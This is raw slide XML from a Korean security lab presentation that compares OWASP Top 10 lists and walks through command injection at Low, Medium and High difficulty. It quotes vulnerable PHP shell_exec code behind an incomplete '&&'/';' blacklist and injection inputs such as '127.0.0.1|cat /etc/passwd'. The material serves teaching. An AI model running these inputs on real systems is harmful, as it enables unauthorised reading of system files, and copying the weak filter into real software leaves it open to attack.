                        <a:t>A3 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" b="1" spc="0" dirty="0"/>
                        <a:t>과도한 데이터 노출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47701"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="475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0" dirty="0"/>
                        <a:t>A4 : XML </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" spc="0" dirty="0"/>
                        <a:t>외부 개체 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" spc="0" dirty="0"/>
                        <a:t>(XXE)</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US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spc="0" dirty="0"/>
                        <a:t>A4 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" b="1" spc="0" dirty="0"/>
                        <a:t>자원고갈 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" b="1" spc="0" dirty="0"/>
                        <a:t>&amp; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" b="1" spc="0" dirty="0"/>
                        <a:t>속도제한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876437"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="475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0" dirty="0"/>
                        <a:t>A5 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" spc="0" dirty="0"/>
                        <a:t>취약한 접근 통제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spc="0" dirty="0"/>
                        <a:t>A5 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" b="1" spc="0" dirty="0"/>
                        <a:t>취약한</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" b="1" spc="0" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" b="1" spc="0" dirty="0"/>
                        <a:t>기능 단위 인증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8168456"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="475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0" dirty="0"/>
                        <a:t>A6 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" spc="0" dirty="0"/>
                        <a:t>잘못된 보안 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spc="0" dirty="0"/>
                        <a:t>A6 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" b="1" spc="0" dirty="0"/>
                        <a:t>대량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944336"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="475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0" dirty="0"/>
                        <a:t>A7 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" spc="0" dirty="0"/>
                        <a:t>크로스 사이트 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" spc="0" dirty="0" err="1"/>
                        <a:t>스크립팅</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" spc="0" dirty="0"/>
                        <a:t>(XSS)</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" spc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spc="0" dirty="0"/>
                        <a:t>A7 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" b="1" spc="0" dirty="0"/>
                        <a:t>잘못된 보안 구성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4833199"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="475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0" dirty="0"/>
                        <a:t>A8 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" spc="0" dirty="0"/>
                        <a:t>안전하지 않은 역직렬화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spc="0" dirty="0"/>
                        <a:t>A8 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" b="1" spc="0" dirty="0" err="1"/>
                        <a:t>인젝션</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" spc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3734982"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="475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0" dirty="0"/>
                        <a:t>A9 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" spc="0" dirty="0"/>
                        <a:t>공개된 취약점 구성요소 사용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spc="0" dirty="0"/>
                        <a:t>A9</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" b="1" spc="0" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" b="1" spc="0" dirty="0"/>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" b="1" spc="0" dirty="0"/>
                        <a:t> 부적절한 자산 관리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3732466"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="475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pc="0" dirty="0"/>
                        <a:t>A10 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" spc="0" dirty="0"/>
                        <a:t>불충분한 로깅 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" spc="0" dirty="0"/>
                        <a:t>&amp; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" spc="0" dirty="0"/>
                        <a:t>모니터링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1" spc="0" dirty="0"/>
                        <a:t>A10 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" b="1" spc="0" dirty="0"/>
                        <a:t>불충분 한 로깅 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" b="1" spc="0" dirty="0"/>
                        <a:t>&amp; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" b="1" spc="0" dirty="0"/>
                        <a:t>모니터링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896975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2644406-9962-469F-AB15-7C19D6A9163D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3046568" y="3834351"/>
            <a:ext cx="521081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9BED980-0DC0-4320-BAE0-4E8D9096EDCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3046568" y="3307075"/>
            <a:ext cx="521081" cy="3398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66C1112-9ADC-4236-8530-22B45F24DDCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3343633" y="7151056"/>
            <a:ext cx="27815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A3D85AA-00C6-452E-B7F8-4F726104D0D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2671010" y="2895888"/>
            <a:ext cx="896639" cy="340313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6B25DEB-A42F-434E-916F-3845C0F8D0B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2875547" y="5225098"/>
            <a:ext cx="698404" cy="565925"/>
          </a:xfrm>
          <a:prstGeom prst="line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FC997CE-47E0-4193-8ABB-74C792DFAFE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3046568" y="2915041"/>
            <a:ext cx="521081" cy="3920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22804290-AA6A-495F-8EBC-816B81D25FB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3046568" y="3297249"/>
            <a:ext cx="521081" cy="1503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부제목 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{377DA374-70DB-42C6-B802-EBF0970F0A12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688185" y="7453468"/>
            <a:ext cx="5685973" cy="131615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solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Bell MT" panose="02020503060305020303" pitchFamily="18" charset="0"/>
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>• 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취약한 인증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취약점이 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가지로 세분화됨</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0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rgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Bell MT" panose="02020503060305020303" pitchFamily="18" charset="0"/>
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>• 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000" b="1" dirty="0" err="1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인젝션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], [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주요 데이터 노출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], [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잘못된 보안 구성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], [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불충분한 로깅 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모니터링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총 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 취약점이 유지됨</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333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2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Bell MT" panose="02020503060305020303" pitchFamily="18" charset="0"/>
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>•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[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자원고갈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속도제한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], [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대량 할당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[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부적절한 자산 관리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] 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총 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333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가지의 신규 취약점 발표됨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63397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2.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Low)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a typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>2) Low Level </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 소스코드 분석 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>- 2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 </a:t>
            </a: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입력값을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저장하는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&amp;target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변수에 대한 적절한 필터링이 전혀 이루어지지 않았다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buFontTx/>
              <a:buChar char="-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이로인해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공격자가 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‘;’, ‘&amp;&amp;’, ‘&amp;’, ‘|’, ‘||’ </a:t>
            </a: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등의 구문을 통하여 시스템 명령어를 사용할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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데이터 처리를 위해 시스템 명령어를 웹 어플리케이션에서 직접 호출하여 사용하여 보안적으로 취약하다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1991D8F-5C73-4C4A-B327-7803F1E5759F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="736600" y="4332869"/>
          <a:ext cx="5308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9337">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1684973253"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4689263">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3927394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58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앞의 명령어가 실패하더라도 다음 명령어 실행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14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&amp;&amp;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앞의 명령어가 성공하면 다음 명령어 실행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064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&amp;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앞의 명령어를 백그라운드로 실행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동시에 뒤의 명령어 실행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6544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|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앞의 명령어 결과값을 다음 명령어의 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
                        <a:t>입력값으로</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t> 사용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67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||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앞부터 순차적 명령 실행하되 성공 시 다음 명령 실행 안함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009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95766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 Command Injection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cat /</a:t>
            </a:r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etc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/passwd &amp;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명령어 입력 시 여전히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ping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결과나 오류메시지 대신 명령어 수행 결과가 출력된다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E4DA2BD2-9370-4511-9CB7-7D2DA9606BAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549063" y="2398570"/>
            <a:ext cx="5736954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&amp; cat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/passwd &amp;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5DBCEF-176C-4523-82CA-AFFF6065A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96" y="2795266"/>
            <a:ext cx="5859808" cy="359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504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a typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>5) Medium Level </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>소스코드 분석 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"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ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>표시한 부분이 추가됨</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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71C3C463-FD29-416F-A683-E1D592ECFCFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549063" y="2424906"/>
            <a:ext cx="5748414" cy="68384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isset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$_POST[ 'Submit' ]  ) ) {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Get input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$target = $_REQUEST[ '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' ];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Set blacklist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$substitutions = array(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'&amp;&amp;' =&gt; '',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';'  =&gt; '',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);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Remove any of the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charactars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in the array (blacklist).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$target =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str_replace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array_keys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$substitutions ), $substitutions, $target );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Determine OS and execute the ping command.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if(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stristr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php_uname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's' ), 'Windows NT' ) ) {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// Windows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cmd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=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shell_exec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'ping  ' . $target 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}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else {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// *nix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cmd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=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shell_exec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'ping  -c 4 ' . $target );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}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Feedback for the end user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echo "&lt;pre&gt;{$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cmd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}&lt;/pre&gt;";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}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?&gt; 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54B175-55BB-4504-BFE4-6BA50BD6208F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620366" y="3962400"/>
            <a:ext cx="5594350" cy="19475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DDD1D-DA30-4D90-ADD1-1CA5D84EEA86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2199899" y="4405564"/>
            <a:ext cx="243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→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‘&amp;&amp;’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과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‘;’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공백으로 대체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FF62B-DFF8-4760-864B-F7020EB16B7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1499940" y="5425737"/>
            <a:ext cx="3629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입력값을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위에서 설정한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substitutions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을 통해</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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&amp;&amp;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과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;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 있다면 공백으로 대체한다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  <a:endParaRPr lang="ko-KR" altLang="en-US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77567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Medium)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a typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>5) Medium Level </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>소스코드 분석 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>– 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR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ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>사용자 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>입력값을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 저장하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>&amp;target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>변수에 대한 필터링이 추가되었다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>. (‘&amp;&amp;’, ‘;’)</a:t>
            </a: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 err="1">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>이로인해</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 다음과 같은 명령어는 실행되지 않는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold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ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>그러나 일부분에 대해서만 필터링이 되었으며</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"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>
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>그 외 다른 구문에 대해서는 적절한 검증이 되지 않아 방금 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>&amp; cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1"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ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>/passwd &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>명령어 입력에서 확인할 수 있듯이 여전히 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Command Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>공격이 유효하다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>.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E3F4805-EE42-4CBC-8802-813406D738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42" y="4142094"/>
            <a:ext cx="5621338" cy="1514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193DB70-9ADC-4CB7-BC0D-84A6BFFB7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2" y="7375526"/>
            <a:ext cx="5272088" cy="119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471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 Command Injection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앞서 사용한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연산자를 활용한 명령어 입력 시 결과가 출력되지 않는다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E4DA2BD2-9370-4511-9CB7-7D2DA9606BAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549063" y="2398570"/>
            <a:ext cx="5736954" cy="35107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&gt; &amp; cat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/passwd &amp;</a:t>
            </a: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C646A5-71DF-4657-86E7-43A17E1F9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4" y="3006989"/>
            <a:ext cx="5736954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538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 Command Injection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ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>명령어 입력 시 결과가 출력되지 않는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold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>
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>파이프라인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>‘| ’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>‘||’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>을 사용한 명령어는 정상적으로 실행되는 것을 확인할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800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 dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>이를 통해 취약점이 여전히 존재하는 것을 확인할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold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E4DA2BD2-9370-4511-9CB7-7D2DA9606BAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="637204" y="2518060"/>
            <a:ext cx="5433396" cy="103579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&amp; cat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/passwd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&amp;&amp; cat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/passwd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; cat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/passwd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3" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C3F5B79-A1A6-4E4F-A320-47AC494FB863}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="637204" y="4240667"/>
            <a:ext cx="5433396" cy="71233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1|cat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/passwd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|| cat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/passwd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ko-KR" altLang="en-US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782A58-257D-4424-9807-D8FE1D0E6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4" y="5201711"/>
            <a:ext cx="5433396" cy="1000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1F2B17-A19B-48A4-A6BB-1C478E733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02" y="6200248"/>
            <a:ext cx="5433396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55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4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 High)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a typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>2) High Level </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>소스코드 분석 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"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ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>변경된 부분만 표시</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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14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"/>
              </a:rPr>
              <a:t>127.0.0.1|cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>etc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"/>
              </a:rPr>
              <a:t>/passwd &gt;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"/>
              </a:rPr>
              <a:t>됨</a:t>
            </a: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"/>
              </a:rPr>
              <a:t>127.0.0|| cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>etc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"/>
              </a:rPr>
              <a:t>/passwd &gt;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"/>
              </a:rPr>
              <a:t>됨</a:t>
            </a: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"/>
              </a:rPr>
              <a:t>127.0.0.1|(cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>etc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"/>
